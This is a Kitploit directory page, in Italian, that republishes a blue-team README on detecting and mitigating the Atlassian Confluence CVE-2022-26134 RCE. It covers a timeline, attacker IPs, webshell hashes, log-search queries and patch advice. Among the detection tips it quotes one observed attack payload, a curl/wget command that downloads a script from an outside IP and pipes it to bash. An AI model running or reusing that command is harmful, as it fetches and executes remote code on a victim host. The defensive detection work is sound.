Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Confluence-CVE-2022-26134 — Questa repository tratta dello sfruttamento zero-day di Atlassian Confluence, dal punto di vista della difesa e dell'analisi, nella prospettiva di un SecOps o di un Blue Team. | Kitploit
Strumenti/GitHubGitHub/archanchoudhury/confluence-cve-2022-26134
Gestione degli Indicatori di Compromissione (IOC)Analisi delle VulnerabilitàExploitInformatica ForenseSicurezza WebThreat IntelligenceRilevamento IntrusioniApprendimento e FormazioneRisposta agli Incidenti

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
GitHubarchanchoudhury/confluence-cve-2022-26134

Confluence-CVE-2022-26134

Questa repository tratta dello sfruttamento zero-day di Atlassian Confluence, dal punto di vista della difesa e dell'analisi, nella prospettiva di un SecOps o di un Blue Team.

Vedi Repository
4384 anni faNon ancora revisionato
Condividi

Confluence-CVE-2022-26134

Questo repository tratta dello sfruttamento zero-day di Atlassian Confluence, con un punto di vista difensivo e di analisi dalla prospettiva di un team SecOps o Blue Team

Indice

  • Informazioni
  • Cronologia
  • Comprendere l'exploit
  • Elenco degli IOC
  • Strategia di rilevamento
  • Piani di mitigazione
  • Riferimenti

Informazioni

Nel corso del fine settimana del Memorial Day negli Stati Uniti, Volexity ha condotto un'indagine di incident response coinvolgente due server web esposti a Internet appartenenti a uno dei suoi clienti, che eseguivano il software Atlassian Confluence Server. L'indagine è iniziata dopo che è stata rilevata attività sospetta sugli host, tra cui webshell JSP scritte su disco. Volexity ha immediatamente utilizzato Volexity Surge Collect Pro per raccogliere la memoria di sistema e i file chiave dai sistemi Confluence Server per l'analisi. Dopo un esame approfondito dei dati raccolti, Volexity è stata in grado di determinare che il compromesso del server derivava da un attaccante che lanciava un exploit per ottenere esecuzione di codice in remoto. Volexity è successivamente riuscita a ricreare quell'exploit e a identificare una vulnerabilità zero-day che impattava versioni completamente aggiornate di Confluence Server.

Dopo la scoperta e la verifica di questa vulnerabilità, Volexity ha contattato Atlassian per segnalare i dettagli rilevanti il 31 maggio 2022. Atlassian ha da allora confermato la vulnerabilità e ha successivamente assegnato il problema a CVE-2022-26134. È stato confermato che funziona sulle versioni attuali di Confluence Server e Data Center.

Cronologia

  • Un advisory datato 2 giugno, 13:00 PT (20:00 UTC), non descrive la natura della falla e rivela che è stata rilevata una "attiva exploitation in corso". Nessuna patch è disponibile.
  • Volexity scopre uno zero-day in Confluence il 03/06/2022 (GMT)
  • Il 03/06/2022 (GMT) Atlassian
    • Chiarite le versioni interessate
    • Aggiunta una regola WAF
    • Aggiunta una stima dei tempi per la disponibilità delle correzioni
  • Il 03/06/2022 abbiamo visto tentativi di exploitation attivi e POC rilasciati su tutto Internet.
  • Il 03 Giu 2022 alle 8:00 PDT (Pacific Time, -7 ore) Atlassian informazioni di mitigazione per includere file jar e class sostitutivi
  • Il 03 Giu 2022 alle 10:00 PDT (Pacific Time, -7 ore) Atlassian ha aggiornato con le versioni corrette e ha rimosso il consiglio provvisorio sull'aggiunta di una regola WAF.
  • Il 03 Giu 2022 alle 16:00 PDT (Pacific Time, -7 ore) Atlassian ha aggiornato per chiarire le limitazioni degli aggiornamenti rolling.

Fai riferimento ai dettagli tecnici QUI

Comprendere l'exploit

  • Puoi fare riferimento al blog di Volexity QUI per comprendere tutti i dettagli del principio di funzionamento di questo exploit e i dettagli dell'analisi.
  • Guarda questo VIDEO per capire l'exploit e la sua risoluzione.

Elenco degli IOC

  • Poiché si tratta di una vulnerabilità zero-day e può essere sfruttata molto facilmente, non esiste un elenco esclusivo di IOC. Dalla ricerca della community è stato osservato che gli attaccanti hanno tentato di distribuire XMRIG, KINSING, MIRAI, ecc. dopo lo sfruttamento.
  • La stringa dell'exploit "sembra" contenere questa stringa ${ Questo pattern non è urlencodato e non è URL SAFE, quindi nei log apparirà come: $%7B.
  • Il blog di Volexity fa riferimento al file di Confluence: noop.jsp
  • La presenza di una webshell con estensione .jsp e senza dettagli sul percorso. Ad esempio QUESTO
  • Alcuni indirizzi IP-
root@kitploit:~
154.146.34.145
154.16.105.147
156.146.34.46
156.146.34.52
156.146.34.9
156.146.56.136
198.147.22.148
198.147.22.148
221.178.126.244
45.43.19.91
59.163.248.170
64.64.228.239
66.115.182.102
66.115.182.111
67.149.61.16
98.32.230.38
193.106.191.48
  • Hash dei file per la noop.jsp dannosa
root@kitploit:~
f39b321472b8dac2452e4c0bc687cb5aa401ac6687520fdc9fd523a17477886d
f8df4dd46f02dc86d37d46cf4793e036
  • È stata osservata il 4 giugno 2022 una vasta attività di exploitation di Atlassian Confluence CVE-2022-26134, specificamente confermata funzionante. Trova gli IP univoci QUI

Strategia di rilevamento

  • Se hai un Confluence Server e Data Center esposto a Internet e non patchato, è saggio interpretarlo come Compromesso
  • Cerca nuovi file nel percorso di Confluence su disco che abbiano estensione .jsp o qualsiasi altra.
  • Cerca processi figli sospetti nei log di Tomcat
root@kitploit:~
DeviceProcessEvents
| where InitiatingProcessFileName has_any( @"tomcat9.exe")
//| where ProcessCommandLine has_any (@"whoami.exe",@"nslookup.exe")
  • Cerca la stringa ${ in (install directory)/logs/*.log
  • Nei log di accesso prova egrep -a -i -f pattern.txt *.log dove pattern.txt dovrebbe essere salvato come ${ oppure prova grep "\${" log file path o prova grep "$%7B" log file path
  • Potresti ricevere richieste web in arrivo per noop.js, quindi puoi provare findstr -i noop.jsp "logpath"
  • Potresti avere directory di installazione diverse, quindi prova a cercare $jspname_jsp.java nella directory confluence_install_dir/work/Standalone/. Ad esempio, se trovi una shell di nome hack.jsp dovresti vedere hack_jsp.java. Se non trovi più hack.jsp su disco, prova a cercare nei log web l'accesso ad essa. Darà l'indicazione di quando è stata acceduta/cancellata.
  • La query EQL process where event='CreateProcess' and parent_process_path='/opt/atlassian/confluence/jre/bin/java' and process_user_name='confluence' può aiutare a identificare, come descritto da David QUI
  • Cerca questo payload comune bash -c '(curl -s 195.2.79[.]26/cf.sh||wget -q -O- 195.2.79[.]26/cf.sh)|bash nei log web
  • Una firma Suricata può essere trovata QUI
  • La configurazione di ognuno può essere diversa, ma Confluence ha in gran parte solo questi file JSP:
root@kitploit:~
./admin/findspaceattachments.jsp
./admin/cluster/hashclustername.jsp
./admin/default.jsp
./classpath.jsp
./errors/notfound.jsp
./500page.jsp
./errors.jsp
./noop.jsp

quindi cerca file creati di recente che non sono elencati sopra

  • Controlla i file su disco non elencati e nei log di accesso con risposte 200. Inoltre, verifica se qualcuno di questi file è stato modificato. In particolare noop.jsp è molto diffusa e di solito è di circa 103 byte.
  • Se hai identificato che il file noop.jsp è stato segnalato, utilizza questo SCRIPT per determinare se è sospetto.
  • Puoi usare questo SCRIPT per eseguire una rapida scansione dei tuoi log per vedere potenziali attori della minaccia. NOTA- L'elenco degli IP deve essere verificato prima dell'uso e non è esclusivo.
  • Esamina più casi per cercare file .java nella directory ./confluence/org/apache/jsp/ che non dovrebbero essere lì.
  • Cerca alberi di processi e l'esecuzione di processi su qualsiasi host in cui hai identificato un tentativo di exploit. Dovresti cercare alberi di processi come- java->bash->python->bash
  • Un processo bash, generato da uno python, il cui padre era un altro bash e poi il processo root java. Tale tipo di esecuzione dovrebbe essere identificato

Piani di mitigazione

  • Al momento del primo commit di questo repository, Atlassian ha rilasciato versioni patchate di Confluence Server e Data Center QUI
  • Se non puoi aggiornare Confluence immediatamente, come soluzione temporanea puoi mitigare il problema CVE-2022-26134 aggiornando i seguenti file come descritto QUI
  • Come passo immediato, crea un piano di incident response per identificare le tue istanze esposte a Internet ed esegui il rilevamento. Metti inoltre il server in whitelist IP o dietro una VPN per ridurre la superficie di rischio.

Riferimenti

  • https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
  • https://www.theregister.com/2022/06/03/atlassian_confluence_critical_flaw_attacked/
  • https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
  • https://www.shodan.io/search?query=x-confluence
  • https://www.shodan.io/search?query=http.favicon.hash%3A-305179312
  • https://www.pwndefend.com/2022/06/03/cve-2022-26134-confluence-zero-day-rce/
  • https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog
  • https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis?referrer=notificationEmail
  • https://blog.cloudflare.com/cloudflare-observations-of-confluence-zero-day-cve-2022-26134/
Scarica lo strumento